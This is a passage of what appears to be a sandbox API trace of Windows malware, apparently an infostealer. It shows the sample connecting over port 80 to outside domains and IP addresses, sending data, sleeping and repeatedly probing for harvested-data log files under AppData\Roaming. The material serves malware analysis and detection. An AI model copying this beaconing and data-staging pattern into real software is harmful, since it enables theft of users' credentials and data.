(af=2, type=1, protocol=6) returned 0x2688 [0224.675] getaddrinfo (in: pNodeName="www.lovejaclyn.com", pServiceName="80", pHints=0x878f3b8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x878f3e8 | out: ppResult=0x878f3e8*=0x862b800*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8884e40*(sa_family=2, sin_port=0x50, sin_addr="209.99.64.43"), ai_next=0x0)) returned 0 [0224.681] connect (s=0x2688, name=0x8884e40*(sa_family=2, sin_port=0x50, sin_addr="209.99.64.43"), namelen=16) returned 0 [0224.819] send (s=0x2688, buf=0xa10808a*, len=172, flags=0) returned 172 [0224.819] setsockopt (s=0x2688, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0224.819] recv (in: s=0x2688, buf=0x107df040, len=2048000, flags=0 | out: buf=0x107df040*) returned 14600 [0225.330] closesocket (s=0x2688) returned 0 [0225.331] Sleep (dwMilliseconds=0x7d0) [0225.333] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.333] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.333] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0225.333] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0225.333] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.333] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.334] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0225.334] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0225.334] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.334] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.334] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0225.334] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0225.334] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.334] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.334] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0225.334] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0225.334] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.335] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.335] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0225.335] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0225.335] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.335] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.335] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0225.335] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0225.335] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.335] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.335] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0225.335] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0225.335] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.335] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.336] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0225.336] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0225.336] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.336] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.336] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0225.336] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0225.336] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.336] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.336] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0225.336] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0225.336] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.336] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.336] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0225.336] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0225.336] socket (af=2, type=1, protocol=6) returned 0x2688 [0225.337] getaddrinfo (in: pNodeName="www.largestjerseysstore.com", pServiceName="80", pHints=0x878f758*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x878f788 | out: ppResult=0x878f788*=0x862c240*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8884e80*(sa_family=2, sin_port=0x50, sin_addr="156.245.192.153"), ai_next=0x0)) returned 0 [0225.338] connect (s=0x2688, name=0x8884e80*(sa_family=2, sin_port=0x50, sin_addr="156.245.192.153"), namelen=16) returned 0 [0225.543] send (s=0x2688, buf=0xa10808a*, len=181, flags=0) returned 181 [0225.544] setsockopt (s=0x2688, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0225.544] recv (in: s=0x2688, buf=0x107df040, len=2048000, flags=0 | out: buf=0x107df040*) returned 2359 [0225.768] closesocket (s=0x2688) returned 0 [0225.768] Sleep (dwMilliseconds=0x7d0) [0225.770] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.770] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.770] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0225.771] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0225.771] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.771] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.771] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0225.771] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0225.771] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.771] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.771] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0225.771] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0225.771] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.771] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.771] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0225.771] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0225.771] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.771] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.772] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0225.772] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0225.772] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.772] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.772] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0225.772] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0225.772] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.772] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: 